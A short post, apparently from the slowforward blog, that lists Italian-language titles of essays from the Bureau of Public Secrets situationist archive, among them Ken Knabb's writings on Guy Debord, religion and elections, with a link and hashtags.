Confessioni di un garbato nemico dello stato (1997):
parte 1
parte 2
parte 3
Corrispondenza sulla questione della religione (1997-2000)
Riformismo y politica elettorale (2002)
Introduzione ai film di Guy Debord (2003)
Risposta ad un liberale del Midwest (2003)
Porta d’ingresso ai vasti domini (Introduzione) (2004)
Comprendere Debord dialetticamente (2005/2010)
Riflessioni sulla sollevazione in Francia (2006)
Documenti della sollevazione anti-CPE in Francia (2006)
Opinioni francofone sull’Ufficio dei Segreti Pubblici (2007-2008)
Ken Knabb, l’Internazionale Situazionista e la controcultura nord-americana (Jean-Pierre Depétris, 2008)
Introduzione al libro di Ngo Van In the Crossfire: Adventures of a Vietnamese Revolutionary (2010)
Nota sullo stalinismo e sul trotskismo (2010)
Il risveglio in America (2011)
Al di là del voto (2012/2016)

slowforward.net/2024/08/13/the…

#000000 #anarchy #archive #bureauOfPublicSecrets #dance #durruti #ffffff #internationalSituationist #KennethRexroth #Situationism #situationistInternational #Situazionismo

the ‘bureau of public secrets’: an astounding (situationist) archive

_ e ci sono anche…

^slowforward